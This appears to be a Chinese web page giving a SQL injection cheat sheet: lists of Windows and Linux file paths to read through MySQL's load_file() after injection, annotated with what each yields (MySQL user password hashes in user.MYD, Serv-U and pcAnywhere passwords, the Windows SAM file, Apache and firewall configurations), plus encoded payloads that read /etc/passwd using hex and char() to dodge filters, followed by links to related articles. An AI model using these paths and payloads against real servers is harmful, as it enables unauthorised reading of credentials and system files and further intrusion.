MySQL注入load_file常用路径
WINDOWS下:
c:/boot.ini //查看系统版本
c:/windows/php.ini //php配置信息
c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\
mysql\
data\
mysql\
user.MYD //存储了mysql.user表中的数据库连接密码
c:\
Program Files\
RhinoSoft.com\
Serv-U\
ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\
Program Files\
Serv-U\
ServUDaemon.ini
c:\
windows\
system32\
inetsrv\
MetaBase.xml 查看IIS的虚拟主机配置
c:\
windows\
repair\
sam //存储了WINDOWS系统初次安装的密码
c:\
Program Files\
Serv-U\
ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
c:\
Program Files\
RhinoSoft.com\
ServUDaemon.exe
C:\
Documents and Settings\
All Users\
Application Data\
Symantec\
pcAnywhere\
*.cif文件
//存储了pcAnywhere的登陆密码
c:\
Program Files\
Apache Group\
Apache\
confhttpd.conf
或C:\
apache\
conf\
httpd.conf //查看WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\
APACHE\
Apache2\
confhttpd.conf
C:\
Program Files\
mysql\
my.ini
C:\
mysql\
data\
mysql\
user.MYD 存在MYSQL系统中的用户密码
`
LUNIX/UNIX 下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
相关文章
- 【MySQL高级】Mysql并发参数调整及常用SQL技巧
- MySQL Status Qcache_total_blocks 数据库状态作用意思及如何正确
- MySQL初学者指南:快速入门(mysql菜鸟)
- 构建腾讯云MySQL连接,实现智能数据管理(腾讯云mysql连接)
- 教程MySQL主从复制实战视频教程(mysql主从复制视频)
- MySQL防止SQL注入的有效措施(mysql防止注入)
- 修改MySQL安装与端口修改实践(mysql安装端口)
- MySQL常用参数配置实践(mysql常用参数配置)
- MySQL 注入攻击技术及防范教程(mysql注入教程)
- MySQL 创建分区表使用改进的数据库结构(mysql创建分区表)
- 优化MySQL分页效率优化:实现快速检索与分页(mysql分页效率)
- 深入理解MySQL事务机制:从概念到实践(mysql事务概念)
- PHP与MySQL完美结合:数据库操作常用语句及优化技巧(php使用mysql)
- MySQL如何快速导入大型数据库(mysql 导入大数据库)
- 安全Mysql注入:确保服务器权限安全(mysql注入权限)
- MySQL主从复制,实现数据库高可用性(mysql中主从配置)
- 如何在MySQL中连接两个表(mysql两表怎么连接)
- CDH集群MySQL实现无缝迁移(cdh集群mysql迁移)
- ASP网页MySQL注入及防御研究(asp页面mysql注入)
- 阿里云MySQL,注入智能新生代(ali mysql)
- 警惕MySQL注入攻击,保护你的数据安全(7.mysql注入问题)
- 数据库用cmd建立MySQL数据库的指南(cmd建立mysql)
- 三天精通MySQL挑战赛(3天挑战mysql)
- MySQL如何处理重要的字段(mysql中关键字段处理)
- MySQL常用的版本是哪个(mysql 一般哪个版本)
- 如何在MySQL上改变字段类型(mysql上改变字段类型)